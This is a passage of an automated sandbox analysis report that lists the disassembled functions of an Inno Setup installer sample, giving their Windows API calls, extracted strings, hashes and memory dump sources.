                                                                  • Instruction ID: 3321041a09622c131d5de1c426c5b9ba37bf97161ea704a377034d17a7c99502
                                                                  • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                  • Instruction Fuzzy Hash: 2EF0AF7230564157D7209B2EC984ABB62F69F88318B54483FE419CBB61EB78DCC08658
                                                                  Function 0042418C Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 00424193
                                                                    • Part of subcall function 00423A7C: EnumWindows.USER32(00423A14), ref: 00423AA0
                                                                    • Part of subcall function 00423A7C: GetWindow.USER32(?,00000003), ref: 00423AB5
                                                                    • Part of subcall function 00423A7C: GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                                    • Part of subcall function 00423A7C: SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                                  • SetActiveWindow.USER32(?,?,?,00423D6B,00000000,00424154), ref: 004241A7
                                                                    • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                  • String ID:
                                                                  • API String ID: 2671590913-0
                                                                  • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                  • Instruction ID: 714e4cd20337d44954868cb88e5cd3c5f05620b237e6b6751f152470bbecd415
                                                                  • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                  • Instruction Fuzzy Hash: 47E01AA070011087EB10AF69DCC9B9632A8BB4C304F5501BABD49CF25BD63CC8608728
                                                                  Function 0045D05C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D067
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CryptFour
                                                                  • String ID:
                                                                  • API String ID: 2153018856-0
                                                                  • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                  • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                                  • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                  • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                                  Function 0045D074 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046D934,?,0046DB15), ref: 0045D07A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CryptFour
                                                                  • String ID:
                                                                  • API String ID: 2153018856-0
                                                                  • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                  • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                                  • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                  • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                                  Function 10001130 Relevance: .1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3048728869.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000003.00000002.3048702648.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3048749095.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_10000000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                  • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                  • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                  • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                  Function 10001000 Relevance: .0, Instructions: 2COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3048728869.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000003.00000002.3048702648.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3048749095.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_10000000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                  • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                  • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 0044B650 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0044B5FC: GetVersionExA.KERNEL32(00000094), ref: 0044B619
                                                                  • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C1
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7D3
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7E5
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7F7
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B809
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B81B
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B82D
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B83F
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B851
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B863
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B875
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B887
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B899
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8AB
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8BD
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8CF
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E1
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8F3
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B905
                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B917
                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B929
                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B93B
                                                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B94D
                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B95F
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B971
                                                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B983
                                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B995
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9A7
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9B9
                                                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9CB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                  • API String ID: 1968650500-2910565190
                                                                  • Opcode ID: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                                  • Instruction ID: 77cdb2a24b144e98dd8fe0af3c477b00202e10f27d636664339925e4e96e780e
                                                                  • Opcode Fuzzy Hash: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                                  • Instruction Fuzzy Hash: 679198F0A40B11EBEB00AFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                  Function 0041CA04 Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,?,0041A93C,?), ref: 0041CA38
                                                                  • 73A24C40.GDI32(?,00000000,?,0041A93C,?), ref: 0041CA44
                                                                  • 73A26180.GDI32(0041A93C,?,00000001,00000001,00000000,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA68
                                                                  • 73A24C00.GDI32(?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA78
                                                                  • SelectObject.GDI32(0041CE34,00000000), ref: 0041CA93
                                                                  • FillRect.USER32(0041CE34,?,?), ref: 0041CACE
                                                                  • SetTextColor.GDI32(0041CE34,00000000), ref: 0041CAE3
                                                                  • SetBkColor.GDI32(0041CE34,00000000), ref: 0041CAFA
                                                                  • PatBlt.GDI32(0041CE34,00000000,00000000,0041A93C,?,00FF0062), ref: 0041CB10
                                                                  • 73A24C40.GDI32(?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C), ref: 0041CB23
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041CB54
                                                                  • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C), ref: 0041CB6C
                                                                  • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?), ref: 0041CB75
                                                                  • 73A18830.GDI32(0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB84
                                                                  • 73A122A0.GDI32(0041CE34,0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB8D
                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041CBA6
                                                                  • SetBkColor.GDI32(00000000,00000000), ref: 0041CBBD
                                                                  • 73A24D40.GDI32(0041CE34,00000000,00000000,0041A93C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC02,?,?,00000000), ref: 0041CBD9
                                                                  • SelectObject.GDI32(00000000,?), ref: 0041CBE6
                                                                  • DeleteDC.GDI32(00000000), ref: 0041CBFC
                                                                    • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                                  • String ID:
                                                                  • API String ID: 1381628555-0
                                                                  • Opcode ID: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                                  • Instruction ID: 82b5d3b79294c4079cc38f46940f8a3e5246528c32e36f15c424f6ef30e38055
                                                                  • Opcode Fuzzy Hash: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                                  • Instruction Fuzzy Hash: 0061F071A44608AFDB10EBE5DC86FEFB7B8EB48704F10446AB504E7281D67CA9508B69
                                                                  Function 004978DC Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000,00498035,?,00000000), ref: 0049795F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000), ref: 00497972
                                                                  • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000), ref: 00497982
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004979A3
                                                                  • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000), ref: 004979B3
                                                                    • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                  • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                  • API String ID: 2000705611-3672972446
                                                                  • Opcode ID: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                                  • Instruction ID: f92775941c35c4987ffcee83f2591dcd2e8f64eb72217f5dcf8b9acaa4e0c6bb
                                                                  • Opcode Fuzzy Hash: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                                  • Instruction Fuzzy Hash: 3E91D7306182449FDF11EBA5C856BAE7BF4EB49308F5184B7F500A7392D67CAC05CB19
                                                                  Function 0045A4F8 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,0045A7B4,?,?,?,?,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 0045A666
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                  • API String ID: 1452528299-3112430753
                                                                  • Opcode ID: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                                  • Instruction ID: 580fd2345af5d8a11a71580b87de25b1444814d8228b9e74f7717922954df390
                                                                  • Opcode Fuzzy Hash: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                                  • Instruction Fuzzy Hash: E07181307002445BCB01EB6988817AE7BB59F48319F50866BFC01EB383DB7CDE59879A
                                                                  Function 0045C9E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetVersion.KERNEL32 ref: 0045C9FA
                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CA1A
                                                                  • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CA27
                                                                  • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CA34
                                                                  • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CA42
                                                                    • Part of subcall function 0045C8E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C987,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C961
                                                                  • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CAFB
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CB04
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                  • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                  • API String ID: 59345061-4263478283
                                                                  • Opcode ID: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                                  • Instruction ID: 7cfcd68cf7d50f34506c8699d7ac6bd3cbd645d605ef7a14e0a5f99aee2185cc
                                                                  • Opcode Fuzzy Hash: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                                  • Instruction Fuzzy Hash: C25186B1D00308EFDB11DF99C885BAEBBB8EB4C311F14806AF915B7241C6799945CFA9
                                                                  Function 00456538 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 282comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,00456875), ref: 0045657A
                                                                  • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,00456875), ref: 004565A0
                                                                  • SysFreeString.OLEAUT32(?), ref: 0045672D
                                                                  Strings
                                                                  • IPropertyStore::Commit, xrefs: 0045677D
                                                                  • IPersistFile::Save, xrefs: 004567FC
                                                                  • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 0045668F
                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456712
                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566C3
                                                                  • CoCreateInstance, xrefs: 004565AB
                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456764
                                                                  • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 0045679E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance$FreeString
                                                                  • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                  • API String ID: 308859552-3936712486
                                                                  • Opcode ID: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                                  • Instruction ID: c38ea0ca400292199a4bf55cc3a6d877564858b73cfd7edbf1df179bb9384e2e
                                                                  • Opcode Fuzzy Hash: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                                  • Instruction Fuzzy Hash: A5A12170A00145AFDB50DFA9C885B9E7BF8AF09306F55406AF804E7362DB38DD48CB69
